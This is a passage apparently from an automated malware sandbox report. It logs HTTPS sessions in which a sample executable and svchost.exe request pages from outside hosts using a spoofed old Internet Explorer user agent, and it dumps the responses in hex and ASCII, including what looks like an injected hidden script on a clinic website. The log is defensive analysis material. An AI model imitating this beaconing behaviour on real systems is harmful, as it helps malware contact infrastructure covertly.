                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2425INData Raw: 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65
                                                                                                                                                                                                                                                                        Data Ascii: er/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animate
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2426INData Raw: 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72
                                                                                                                                                                                                                                                                        Data Ascii: especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figur
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2428INData Raw: 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ge-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2429INData Raw: 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: lass="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2430INData Raw: 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f
                                                                                                                                                                                                                                                                        Data Ascii: de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2432INData Raw: 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35
                                                                                                                                                                                                                                                                        Data Ascii: 6</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +5
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2433INData Raw: 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: article" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-con
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2434INData Raw: 34 34 38 0d 0a 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                        Data Ascii: 448pt type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="te
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2435INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        158192.168.2.664871185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2380OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2381INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2381INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        159192.168.2.664915188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2381OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2391INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OClV9AkEWDpcV0m299mLMd8pfjvXREVSt7MZXE8aVX4GfznYuDA%2FipEduZd%2BVRMVLETEyZIgpSd%2F1zFatehFT%2B1BNdDhVElL8opQ1G%2BKoYlMdnJr5EsKQg2AF3ia"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a87b1b5637ca-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2392INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2392INData Raw: 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d
                                                                                                                                                                                                                                                                        Data Ascii: -width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <im
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2393INData Raw: 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 68 76 30 34 79 73 6e 63 68 63 5f 4a 57 45 33 37 41 58 42 75 58 59 62 55 39 41 48 58 77 37 43 71 6c 30 59 34 44 42 55 38 37 70 67 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 5f 6f 42 74 7a 57 73 45 58 53 68 35 6d 79 54 38 59 64 6c 4b 44 75 35 6d 79 6e 79 48 73 41 4a 30 4e 45 5f 31 5f 33 79 70 74 57 73 2d 31 36 37 38 34 33 31 33 38
                                                                                                                                                                                                                                                                        Data Ascii: ction="/?__cf_chl_f_tk=hv04ysnchc_JWE37AXBuXYbU9AHXw7Cql0Y4DBU87pg-1678431389-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="_oBtzWsEXSh5myT8YdlKDu5mynyHsAJ0NE_1_3yptWs-167843138
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2395INData Raw: 6a 5f 58 38 6f 56 5f 5f 69 52 57 4b 61 38 45 75 53 47 6d 56 56 58 51 4b 6e 33 34 63 77 32 53 68 53 4b 37 32 63 58 43 44 4b 7a 73 58 67 41 4a 41 36 52 59 5a 36 57 2d 4e 51 42 63 6f 74 7a 31 49 2d 4f 5f 68 6b 62 45 6e 32 74 6b 61 56 76 61 69 4b 76 61 32 57 75 38 46 4f 61 47 61 31 70 65 54 57 68 43 58 4b 31 42 41 64 4a 42 53 59 4b 57 73 62 34 6a 76 46 39 46 59 36 77 68 79 6d 64 78 32 76 41 4c 49 77 41 44 4c 4b 59 6d 4a 6e 62 7a 6b 58 6b 41 49 55 2d 32 43 72 46 32 69 77 7a 66 47 45 38 4c 79 62 68 37 34 67 4d 77 7a 75 34 56 35 79 48 70 77 35 45 51 6f 70 59 30 62 5a 70 69 59 64 56 32 65 49 58 72 41 44 5a 33 6b 69 54 50 48 43 42 54 77 49 4f 50 48 6a 4a 43 57 30 74 33 55 76 6d 68 56 48 61 31 73 57 47 35 54 30 58 73 2d 71 74 7a 4e 37 4e 7a 66 57 32 70 39 73 57 55
                                                                                                                                                                                                                                                                        Data Ascii: j_X8oV__iRWKa8EuSGmVVXQKn34cw2ShSK72cXCDKzsXgAJA6RYZ6W-NQBcotz1I-O_hkbEn2tkaVvaiKva2Wu8FOaGa1peTWhCXK1BAdJBSYKWsb4jvF9FY6whymdx2vALIwADLKYmJnbzkXkAIU-2CrF2iwzfGE8Lybh74gMwzu4V5yHpw5EQopY0bZpiYdV2eIXrADZ3kiTPHCBTwIOPHjJCW0t3UvmhVHa1sWG5T0Xs-qtzN7NzfW2p9sWU
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2396INData Raw: 20 20 20 20 63 52 61 79 3a 20 27 37 61 35 39 61 38 37 62 31 62 35 36 33 37 63 61 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 66 36 36 63 63 64 30 34 30 38 65 61 30 34 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 68 76 30 34 79 73 6e 63 68 63 5f 4a 57 45 33 37 41 58 42 75 58 59 62 55 39 41 48 58 77 37 43 71 6c 30 59 34 44 42 55 38 37 70 67 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a87b1b5637ca', cHash: 'f66ccd0408ea044', cUPMDTk: "\/?__cf_chl_tk=hv04ysnchc_JWE37AXBuXYbU9AHXw7Cql0Y4DBU87pg-1678431389-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0'
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2397INData Raw: 6e 38 41 38 71 2b 33 47 42 74 6d 4f 64 69 35 4a 6d 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 2f 32 34 72 57 67 78 54 6d 72 64 49 4b 62 58 72 78 6a 42 44 69 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a
                                                                                                                                                                                                                                                                        Data Ascii: n8A8q+3GBtmOdi5Jmw==', i2: '/24rWgxTmrdIKbXrxjBDig==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZ
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2399INData Raw: 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: pt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="cont
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2399INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        16192.168.2.650523188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC215OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
